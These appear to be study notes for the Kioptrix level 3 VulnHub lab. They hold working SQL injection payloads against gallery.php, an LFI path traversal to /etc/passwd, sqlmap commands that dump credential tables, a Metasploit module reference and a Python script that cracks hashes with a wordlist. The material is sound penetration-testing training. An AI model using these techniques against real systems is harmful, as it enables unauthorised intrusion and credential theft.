
VMW - Kioptrix level 1.3


Walkthru:
2. https://blog.g0tmi1k.com/2011/08/kioptrix-level-3 shows the commands and videos but, unlike the site above, doesn't explain what the SELECT statements do. Those SELECT statements can be skipped by using sqlmap instead to pull the hashes.
  1. https://www.abatchy.com/2016/12/kioptrix-3-walkthrough-vulnhub
  2. https://digital-cowboy.github.io/2017/kioptrix-level-3-walkthrough/



  1. Open services: SSH and HTTP
    1. Apache 2.2.8 with PHP 5.2.4 (Ubuntu package 5.2.4-2ubuntu5.6)
  2. http://kioptrix3.com/gallery/gallery.php?id=1'
The thing that caught our eye here was the "id" parameter in the URL, so we injected a single quote (') to see whether the application was vulnerable to SQL injection. It is: the page echoes a database error back to the browser.
Next, find how many columns the injected query returns. Our links should look like this:
http://kioptrix3.com/gallery/gallery.php?id=1 order by 7-- -   (Error: Unknown column)
The -- comments out the rest of the original query; MySQL needs whitespace after it, which is why the payload ends in "-- -". Increase N until the error appears. If ORDER BY N errors while ORDER BY N-1 renders the page normally, the query returns N-1 columns. Here ORDER BY 7 errors and ORDER BY 6 does not, so the query has 6 columns, and any UNION SELECT that follows must supply exactly 6 values.

  1. LFI via the system parameter; it didn't work without the .html suffix on the path:
    1. http://IP/index.php?system=../../../../../etc/passwd.html
  2. Reading the source of every page turned up a Gallarific module, commented out, that is susceptible to SQL injection.
  3. Search exploit-db for it: in /pentest/exploits/exploitdb (BackTrack) or /usr/share/exploitdb (Kali), run grep -i gallarific files.csv
  4. The login page shows the site runs LotusCMS; Metasploit has an exploit module for it (exploit/multi/http/lcms_php_exec).
  5. python sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs lists the database names (sqlmap is not allowed in the exam).
    1. python sqlmap.py -u "http://www.example.com/news.php?id=11" -D db363851433 --tables lists the tables, where db363851433 is the database name.
    2. python sqlmap.py -u "http://www.example.com/news.php?id=11" -D gallery -T dev_accounts -C id,password,username --dump dumps the table of usernames and password hashes, which can then be cracked within Kali or online [https://www.yeahhub.com/live-sql-injection-exploitation-sqlmap-detailed-guide/]
      1. Use the hash-identifier tool to check the hash type (MD5, SHA1, or another).
      2. To crack the hashes, use hashcat, which is preinstalled on Kali Linux.
From <https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/>
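The last two steps (identify the hash type, then crack it with a wordlist) as an added Python example; this is not code from the page, from hash-identifier or from hashcat. The dumped hashes and the wordlist are constructed for the example (the two crackable ones are md5 of "password" and "123456"; the third is a placeholder nothing will match). A real run would feed it the dev_accounts dump and a full wordlist, or hand the hash file to hashcat -m 0 (MD5 mode).

```python
import hashlib
from typing import Dict, List, Optional

# Hex-digest length -> algorithms to try, most likely first for web-app dumps.
# This is what hash-identifier does by pattern; the length alone cannot tell MD5
# from MD4 or NTLM, which is why every candidate of that length is attempted.
CANDIDATES_BY_LENGTH = {
    32: ["md5", "md4"],
    40: ["sha1", "ripemd160"],
    64: ["sha256"],
    128: ["sha512"],
}

# Constructed sample dump in the dev_accounts shape (username -> hash); not the VM's data.
# alice = md5('password'), bob = md5('123456'), carol is an all-f placeholder no word matches.
DUMPED = {
    "alice": "5f4dcc3b5aa765d61d8327deb882cf99",
    "bob": "e10adc3949ba59abbe56e057f20f883e",
    "carol": "ffffffffffffffffffffffffffffffff",
}
WORDLIST = ["letmein", "password", "123456", "qwerty"]   # constructed mini wordlist


def identify(digest: str) -> List[str]:
    """Return candidate algorithm names for a hex digest, or [] if it is not hex."""
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return []
    return CANDIDATES_BY_LENGTH.get(len(digest), [])


def crack(digest: str, wordlist: List[str]) -> Optional[str]:
    """Dictionary attack (what hashcat -m 0 does for MD5): hash every word with
    every candidate algorithm and compare. Returns the plaintext or None."""
    digest = digest.strip().lower()
    for algo in identify(digest):
        try:
            hashlib.new(algo)          # md4/ripemd160 may be absent on OpenSSL 3 builds
        except ValueError:
            continue
        for word in wordlist:
            if hashlib.new(algo, word.encode()).hexdigest() == digest:
                return word
    return None


def crack_dump(dump: Dict[str, str], wordlist: List[str]) -> Dict[str, Optional[str]]:
    """Crack a whole username -> hash dump; uncracked entries map to None."""
    return {user: crack(h, wordlist) for user, h in dump.items()}


if __name__ == "__main__":
    for user, plain in crack_dump(DUMPED, WORDLIST).items():
        print(f"{user}: {plain if plain else '(not in wordlist)'}")
```

Unsalted MD5 of a short password falls to any decent wordlist in seconds, which is exactly why the dev_accounts dump is the pivot in this box; anything left as None after rockyou is a candidate for rules or a mask attack rather than a bigger dictionary.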



